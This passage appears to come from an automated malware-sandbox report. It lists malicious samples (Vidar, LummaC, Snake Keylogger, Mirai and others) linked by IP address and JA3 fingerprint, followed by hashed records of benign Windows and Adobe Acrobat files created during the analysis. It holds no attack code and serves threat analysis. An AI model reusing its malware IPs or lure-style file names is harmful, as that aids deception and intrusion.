                                                        • 206.206.126.252
                                                        gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                        • 206.206.126.252
                                                        U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                        • 206.206.126.252
                                                        PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTRarm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 78.135.74.199
                                                        sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 78.135.115.141
                                                        PO_63738373663838____________________________________________________________________________.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.132.193.46
                                                        File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.132.193.46
                                                        Scan_20241030.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 46.28.239.165
                                                        dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.132.193.46
                                                        nabm68k.elfGet hashmaliciousUnknownBrowse
                                                        • 188.132.241.224
                                                        dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.132.193.46
                                                        PO-Zam#U00f3wienie zakupu-8837837849-pl-.exeGet hashmaliciousDarkCloudBrowse
                                                        • 188.132.193.46
                                                        DRUMMONDLTD _ 21ST_OCTOBER_2024 _.PDFGet hashmaliciousUnknownBrowse
                                                        • 78.135.79.21

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0eskript.batGet hashmaliciousVidarBrowse
                                                        • 150.241.97.10
                                                        msgde.exeGet hashmaliciousQuasarBrowse
                                                        • 150.241.97.10
                                                        6ee7HCp9cD.exeGet hashmaliciousQuasarBrowse
                                                        • 150.241.97.10
                                                        https://www.gglusa.us/Get hashmaliciousUnknownBrowse
                                                        • 150.241.97.10
                                                        ERTL09tA59.exeGet hashmaliciousLummaCBrowse
                                                        • 150.241.97.10
                                                        GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                        • 150.241.97.10
                                                        TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                        • 150.241.97.10
                                                        Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 150.241.97.10
                                                        ciwa.mp4.htaGet hashmaliciousLummaC, PureLog StealerBrowse
                                                        • 150.241.97.10
                                                        37f463bf4616ecd445d4a1937da06e19aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                        • 150.241.97.10
                                                        installer.batGet hashmaliciousVidarBrowse
                                                        • 150.241.97.10
                                                        skript.batGet hashmaliciousVidarBrowse
                                                        • 150.241.97.10
                                                        din.exeGet hashmaliciousVidarBrowse
                                                        • 150.241.97.10
                                                        yoda.exeGet hashmaliciousVidarBrowse
                                                        • 150.241.97.10
                                                        lem.exeGet hashmaliciousVidarBrowse
                                                        • 150.241.97.10
                                                        markiz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                        • 150.241.97.10
                                                        utkin.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                        • 150.241.97.10
                                                        script.ps1Get hashmaliciousVidarBrowse
                                                        • 150.241.97.10
                                                        libcurl.dllGet hashmaliciousMatanbuchusBrowse
                                                        • 150.241.97.10

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                        Download File
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8192
                                                        Entropy (8bit):0.35999246155449205
                                                        Encrypted:false
                                                        SSDEEP:6:6xpoaaD0JOCEfMuaaD0JOCEfMKQmDaxpoaaD0JOCEfMuaaD0JOCEfMKQmD:7aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                        MD5:54D24A9E5B26A574BA88CC61575C44B3
                                                        SHA1:A7BBFB0021907F5A1C0495798440344743155DA8
                                                        SHA-256:502373EC6695657DE5CE332F59FD5E091570CFA5807C961F7EDD11805277F5D6
                                                        SHA-512:16B23BF128E761E1B68F0C62D678E0FEAB634F3ADB2BA3DB7B22DA7753A90C059E13F744F1787A602AC443A72402BED9BA657CF4000EEF351649C9A5F02BF986
                                                        Malicious:false
                                                        Preview:*.>.................D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                        Download File
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1310720
                                                        Entropy (8bit):0.8847854707019341
                                                        Encrypted:false
                                                        SSDEEP:1536:0JVRkX56mk0alaS0aHH0anjJ8PUWJ81s5J8RMvCxwtYD0pQoltqNeveEQYQ1aG9Y:0J7adfWuK0p/QDfKoPeuP0aN4fqoxE
                                                        MD5:50612812C14CC9772575EF6A39204422
                                                        SHA1:056605CB1446848C2ED664557311F6C4E002471E
                                                        SHA-256:EB5435C8D0B1AA3EBD4E1CBF48A779EE1E1A86BE8822D8B4AA35FEC74AFAF449
                                                        SHA-512:24D611403E8E35BFA1D8953B579B1DAC0F77D248B9A96677475D1E42955BB087215AA26C494CA803E277890A35E98315F612BD9BCED9587D8CD61A99EEFEBC88
                                                        Malicious:false
                                                        Preview:2.e.........@..@12...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................K<...kS..#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                        Download File
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x74f2fb4f, page size 16384, Windows version 10.0
                                                        Category:dropped
                                                        Size (bytes):1310720
                                                        Entropy (8bit):0.6554782758957708
                                                        Encrypted:false
                                                        SSDEEP:1536:5SB2ESB2SSjlK/2VT9Dr1k0aXjJ8VQCYkr3g1652UPkLk+kAv/gKr51KrSSfSDZ5:5azaAVVL4y2UC
                                                        MD5:4411FD71A9658DB12AD8B0FD4471008C
                                                        SHA1:6D879B351987C34F9CA8D80103D08EF66468FB48
                                                        SHA-256:5E7BA177465FD47CD73A4D214F3D8E9736621D0CC6804F44F058262BB2999D43
                                                        SHA-512:1855019E5BCF29668164F86315F9225FFE924B217229B8D5C9C3F0EF4A360DA78945D2162A8C0012A457294F33175635DF3A10456EC2FB354D3665795094517B
                                                        Malicious:false
                                                        Preview:t..O... ...............X\...;...{......................0.......42...|..&/...|..h.......42...|..0...........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................r..u42...|.4................V.,.42...|...........................#......0.......................................................................................................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                        Download File
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):16384
                                                        Entropy (8bit):0.08114118028755855
                                                        Encrypted:false
                                                        SSDEEP:6:UCWlzhoJbZIl/J6XdTZOl/0nIl/AWiCpPQ:UCUlCW/kX9ZOWY/DiC
                                                        MD5:E75FDF3A36D320AFBBD12B9B564165BA
                                                        SHA1:2CC83EE1852EC72763E94D270639170935A62263
                                                        SHA-256:E84BBC9F7394B52CA2CB2B2F01A990BE9DDC1091DA0867A8C71C53E8DEC19BFC
                                                        SHA-512:1A09EC24517F467635F029C765EB563A8B4675F13612FD1AB7A6CC11DF9EBB70A7402948BCDAFC57DB42280E0187385C2F8501006623EED52458F031C24340D6
                                                        Malicious:false
                                                        Preview:..)......................................;...{..&/...|..42...|..........42...|..42...|.....l42...|..................V.,.42...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):287
                                                        Entropy (8bit):5.267429110821645
                                                        Encrypted:false
                                                        SSDEEP:6:crATt+q2PFi2nKuAl9OmbnIFUt8Pu8Zmw+Pu8VkwOFi2nKuAl9OmbjLJ:8nvdZHAahFUt8G8/+G85wZHAaSJ
                                                        MD5:3B3CCC8C1E85C28010A699F544AC16D7
                                                        SHA1:9D18CAA6027BAFFBAC4D52D952231BA150E816C6
                                                        SHA-256:A64C974D9BA71E69F6245D920176A59838CA90EB1CA8D623FEA5E82840F80DB9
                                                        SHA-512:50D5F4DE883E16E81AF4A0A4CEE424CCA9C879244188FFF4DAECE5157EDAD8AFB708049C5D2325BC95533C56066D0AEE87BD55A1B4DF45DB83972C84131D6E2B
                                                        Malicious:false
                                                        Preview:2024/12/27-02:47:49.682 e68 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/27-02:47:49.685 e68 Recovering log #3.2024/12/27-02:47:49.685 e68 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):287
                                                        Entropy (8bit):5.267429110821645
                                                        Encrypted:false
                                                        SSDEEP:6:crATt+q2PFi2nKuAl9OmbnIFUt8Pu8Zmw+Pu8VkwOFi2nKuAl9OmbjLJ:8nvdZHAahFUt8G8/+G85wZHAaSJ
                                                        MD5:3B3CCC8C1E85C28010A699F544AC16D7
                                                        SHA1:9D18CAA6027BAFFBAC4D52D952231BA150E816C6
                                                        SHA-256:A64C974D9BA71E69F6245D920176A59838CA90EB1CA8D623FEA5E82840F80DB9
                                                        SHA-512:50D5F4DE883E16E81AF4A0A4CEE424CCA9C879244188FFF4DAECE5157EDAD8AFB708049C5D2325BC95533C56066D0AEE87BD55A1B4DF45DB83972C84131D6E2B
                                                        Malicious:false
                                                        Preview:2024/12/27-02:47:49.682 e68 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/27-02:47:49.685 e68 Recovering log #3.2024/12/27-02:47:49.685 e68 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):331
                                                        Entropy (8bit):5.195753339620762
                                                        Encrypted:false
                                                        SSDEEP:6:c5aQ+q2PFi2nKuAl9Ombzo2jMGIFUt8PfSgZmw+P+SQVkwOFi2nKuAl9Ombzo2jz:dvdZHAa8uFUt8X/+a5wZHAa8RJ
                                                        MD5:33E9D0F2184C5E141AC39058A2CB4FFB
                                                        SHA1:AA2C4C97F03FC7B9BEC78F4F6E7A23B0AF4E7200
                                                        SHA-256:97ED3D21B7D5B85269865C90241910549444D833222A717BFC11F05FDF0FF9A6
                                                        SHA-512:6AA90C42B9E6653C7B10A5A1E9D32A5890024181E75707BB960B087ED2AA7059B37CDC0F9C1B452AF6DB5C9482E6F76451D1AE7C69A6C580B13AB67394168540
                                                        Malicious:false
                                                        Preview:2024/12/27-02:47:49.709 b88 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/27-02:47:49.710 b88 Recovering log #3.2024/12/27-02:47:49.711 b88 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):331
                                                        Entropy (8bit):5.195753339620762
                                                        Encrypted:false
                                                        SSDEEP:6:c5aQ+q2PFi2nKuAl9Ombzo2jMGIFUt8PfSgZmw+P+SQVkwOFi2nKuAl9Ombzo2jz:dvdZHAa8uFUt8X/+a5wZHAa8RJ
                                                        MD5:33E9D0F2184C5E141AC39058A2CB4FFB
                                                        SHA1:AA2C4C97F03FC7B9BEC78F4F6E7A23B0AF4E7200
                                                        SHA-256:97ED3D21B7D5B85269865C90241910549444D833222A717BFC11F05FDF0FF9A6
                                                        SHA-512:6AA90C42B9E6653C7B10A5A1E9D32A5890024181E75707BB960B087ED2AA7059B37CDC0F9C1B452AF6DB5C9482E6F76451D1AE7C69A6C580B13AB67394168540
                                                        Malicious:false
                                                        Preview:2024/12/27-02:47:49.709 b88 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/27-02:47:49.710 b88 Recovering log #3.2024/12/27-02:47:49.711 b88 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\8a5288f3-2300-4d0a-9974-d935f4195766.tmp

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:JSON data
                                                        Category:modified
                                                        Size (bytes):476
                                                        Entropy (8bit):4.979922099301615
                                                        Encrypted:false
                                                        SSDEEP:12:YH/um3RA8sqY7AxsBdOg2HRHAcaq3QYiubpP7E4TX:Y2sRdsJAidMH1r3QYhbd7n7
                                                        MD5:E0483C9CF24B0AC5A3468516B363A1FC
                                                        SHA1:CA3E5AE9E20085617556909F7BCF02D41022DEC4
                                                        SHA-256:DD9990E0527950877407D7854DDB64A67C097628D2162C2B855200603186F754
                                                        SHA-512:6B51AC99B4DCBECED70719B30D6431EB280FC495F107356D44F2F7CF00246E0E3B17C372BBF8093DC55EE133CD92E98D076CAD87B84D8BB3387346F0B2333311
                                                        Malicious:false
                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379845678091680","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":653871},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\94e15f58-d010-4be0-8904-c410bd26b30e.tmp

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):476
                                                        Entropy (8bit):4.962905575204746
                                                        Encrypted:false
                                                        SSDEEP:12:YH/um3RA8sqUT9ksBdOg2Hh7caq3QYiubpP7E4TX:Y2sRds5TdMH43QYhbd7n7
                                                        MD5:F371FDA655516B50D489FC8CFB1306C9
                                                        SHA1:26FAC2270B5A1180925A6B601A8DA8AC188A0096
                                                        SHA-256:730853F0624FCDD3E7C3874FE9A3249995249013D2EBD7F87AAC2A7EB8EF699A
                                                        SHA-512:B8E2189A814C4063996FFF065FAFADE9EF12B7A01408572BCD3844C3CE7BDA1C8750B0DE390CCB61F0BB1193D01574B34C80A8BC5971C8429D8763C45298F8BA
                                                        Malicious:false
                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341061835820912","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149104},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):476
                                                        Entropy (8bit):4.962905575204746
                                                        Encrypted:false
                                                        SSDEEP:12:YH/um3RA8sqUT9ksBdOg2Hh7caq3QYiubpP7E4TX:Y2sRds5TdMH43QYhbd7n7
                                                        MD5:F371FDA655516B50D489FC8CFB1306C9
                                                        SHA1:26FAC2270B5A1180925A6B601A8DA8AC188A0096
                                                        SHA-256:730853F0624FCDD3E7C3874FE9A3249995249013D2EBD7F87AAC2A7EB8EF699A
                                                        SHA-512:B8E2189A814C4063996FFF065FAFADE9EF12B7A01408572BCD3844C3CE7BDA1C8750B0DE390CCB61F0BB1193D01574B34C80A8BC5971C8429D8763C45298F8BA
                                                        Malicious:false
                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341061835820912","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149104},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF66e109.TMP (copy)

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):476
                                                        Entropy (8bit):4.962905575204746
                                                        Encrypted:false
                                                        SSDEEP:12:YH/um3RA8sqUT9ksBdOg2Hh7caq3QYiubpP7E4TX:Y2sRds5TdMH43QYhbd7n7
                                                        MD5:F371FDA655516B50D489FC8CFB1306C9
                                                        SHA1:26FAC2270B5A1180925A6B601A8DA8AC188A0096
                                                        SHA-256:730853F0624FCDD3E7C3874FE9A3249995249013D2EBD7F87AAC2A7EB8EF699A
                                                        SHA-512:B8E2189A814C4063996FFF065FAFADE9EF12B7A01408572BCD3844C3CE7BDA1C8750B0DE390CCB61F0BB1193D01574B34C80A8BC5971C8429D8763C45298F8BA
                                                        Malicious:false
                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341061835820912","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149104},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):3878
                                                        Entropy (8bit):5.237430032488173
                                                        Encrypted:false
                                                        SSDEEP:96:wshFT0h7cA4YC2EVPCqY35NEmNOYcGPtqKYSEVzJpnNhb5qv:wshFT0h7cZb2EVKZPEANcGIK5EVzbN+v
                                                        MD5:138400FB1E3C581B4F59848371755055
                                                        SHA1:F1791A7B3376017F69414697AF7F39DD8AF97E6D
                                                        SHA-256:83ACB8D502051802296AD368DAB2410C92F83F0826221EB17DAC2303E9C4EFE3
                                                        SHA-512:313CF0304B793D0C9447ABC0A8C2DBF1CABA7745D5E41EE40A540B46F34CEAC965062D8CCA4ABEB16ABD426497CECE1C0BD778DA1F5051B7BA7A03359970F0AF
                                                        Malicious:false
                                                        Preview:*...#................version.1..namespace-#..o................next-map-id.1.Pnamespace-03b00fbd_48ad_47b1_8693_0d5562b6d54b-https://rna-resource.acrobat.com/.0..QRr................next-map-id.2.Snamespace-9efb0a2e_bf8a_4008_b12a_325311a763d0-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-493a2582_fd2f_403f_a0b6_bf623eaab337-https://rna-v2-resource.acrobat.com/.2%e.o................next-map-id.4.Pnamespace-285943ad_4ed5_46fb_8713_f1874054bf05-https://rna-resource.acrobat.com/.3nU..^...............Pnamespace-03b00fbd_48ad_47b1_8693_0d5562b6d54b-https://rna-resource.acrobat.com/"..C^...............Pnamespace-285943ad_4ed5_46fb_8713_f1874054bf05-https://rna-resource.acrobat.com/....a...............Snamespace-9efb0a2e_bf8a_4008_b12a_325311a763d0-https://rna-v2-resource.acrobat.com/.+;|a...............Snamespace-493a2582_fd2f_403f_a0b6_bf623eaab337-https://rna-v2-resource.acrobat.com/....o................next-map-id.5.Pnamespace-10b75d2f_11e7_4fa3_ae23_

                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):319
                                                        Entropy (8bit):5.1986628119905705
                                                        Encrypted:false
                                                        SSDEEP:6:c7Q+q2PFi2nKuAl9OmbzNMxIFUt8P0QgZmw+PCQVkwOFi2nKuAl9OmbzNMFLJ:QvdZHAa8jFUt8M5/+d5wZHAa84J
                                                        MD5:920FA9A9AD788E3BBF866C31469C58D3
                                                        SHA1:BBBEF8107E5D55364444A8D7448B2AEA63D86411
                                                        SHA-256:5CCE4A7F5CD5A43107ED526F59AD04F35EB3B6D6A887D71A99AB320F867D6E3C
                                                        SHA-512:8B5FA4CBC03A890F88CE4EB8247DD64ECD674A75474E43AD0D0E10F00994178F327081DD0C4E999F824CE779221A50D1A8560611C72BE0D38C29FB94CD64C5F4
                                                        Malicious:false
                                                        Preview:2024/12/27-02:47:49.807 b88 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/27-02:47:49.821 b88 Recovering log #3.2024/12/27-02:47:49.822 b88 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):319
                                                        Entropy (8bit):5.1986628119905705
                                                        Encrypted:false
                                                        SSDEEP:6:c7Q+q2PFi2nKuAl9OmbzNMxIFUt8P0QgZmw+PCQVkwOFi2nKuAl9OmbzNMFLJ:QvdZHAa8jFUt8M5/+d5wZHAa84J
                                                        MD5:920FA9A9AD788E3BBF866C31469C58D3
                                                        SHA1:BBBEF8107E5D55364444A8D7448B2AEA63D86411
                                                        SHA-256:5CCE4A7F5CD5A43107ED526F59AD04F35EB3B6D6A887D71A99AB320F867D6E3C
                                                        SHA-512:8B5FA4CBC03A890F88CE4EB8247DD64ECD674A75474E43AD0D0E10F00994178F327081DD0C4E999F824CE779221A50D1A8560611C72BE0D38C29FB94CD64C5F4
                                                        Malicious:false
                                                        Preview:2024/12/27-02:47:49.807 b88 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/27-02:47:49.821 b88 Recovering log #3.2024/12/27-02:47:49.822 b88 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241227074753Z-170.bmp

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                        Category:dropped
                                                        Size (bytes):65110
                                                        Entropy (8bit):2.149800531192087
                                                        Encrypted:false
                                                        SSDEEP:192:arW/0KCorycSBECzu9HLdFQqCoVsjfj5KfXKgyQQ0VTFRH0a:ar0vogCzu9HpFQq7S0NyQQ0ZH0a
                                                        MD5:8E76B48B815EF88812C96CC62A3D7390
                                                        SHA1:CF45768B64E9D83D7892D02ECFA90B17C03AD626
                                                        SHA-256:0ECA97B3D5B789FEA64A38D8966BBA31C8C8C43487F352D2C02AB9F61F9EB54B
                                                        SHA-512:84F114F38F8F5F90DC86BADDAD9FAE1724EADF6A05C2B3CCD65D2918C068FC56A138D333348B55D7A69F935999758475B9D41A4DA860A1DAAAA4CA37534E9A40
                                                        Malicious:false
                                                        Preview:BMV.......6...(...k...h..... ....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                        Category:dropped
                                                        Size (bytes):86016
                                                        Entropy (8bit):4.438754316787656
                                                        Encrypted:false
                                                        SSDEEP:384:yejci5GMiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:0gurVgazUpUTTGt
                                                        MD5:58F943B86EF48DA66B3A230EE7591A0C
                                                        SHA1:743F387F4E51F7F2FBC63E78B101A144144611E0
                                                        SHA-256:411B90598DB39B6CD88D0F575A709FAB1013C1A49D6E3F2D7A0887110ADBF58E
                                                        SHA-512:0EEDE7C2F58E46B1CD03C7CBFF45210257C1E52567D37F140C667306D2F4673F25CD132D9DD140B808876FB33D896493702A6B68CB703258F9BF41A3E5CEBFF6
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:SQLite Rollback Journal
                                                        Category:dropped
                                                        Size (bytes):8720
                                                        Entropy (8bit):3.7747576877099185
                                                        Encrypted:false
                                                        SSDEEP:48:7MEp/E2ioyVAioy5oWoy1CUoy1YKOioy1noy1AYoy1Wioy1hioybioy+oy1noy1c:7PpjuAJjXKQLwb9IVXEBodRBkh
                                                        MD5:7F631BBD3489538A37C28548ADD42B54
                                                        SHA1:39997426D258BF96A60512F0E59671A95C40F2C3
                                                        SHA-256:556E537D971159787A9AABD8CB0E1F8528E1D2ED0D8C97A11FFBD8BD64C51123
                                                        SHA-512:0FC0439542CA889EC7039025563DF7995B4DFFAF846737EC45E000802D852938283D1BEC75F0B6B38C104AC28986770C24982833B24A3107E7CCCFAD14A5D6D7
                                                        Malicious:false
                                                        Preview:.... .c........O...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:Certificate, Version=3
                                                        Category:dropped
                                                        Size (bytes):1391
                                                        Entropy (8bit):7.705940075877404
                                                        Encrypted:false
                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                        Malicious:false
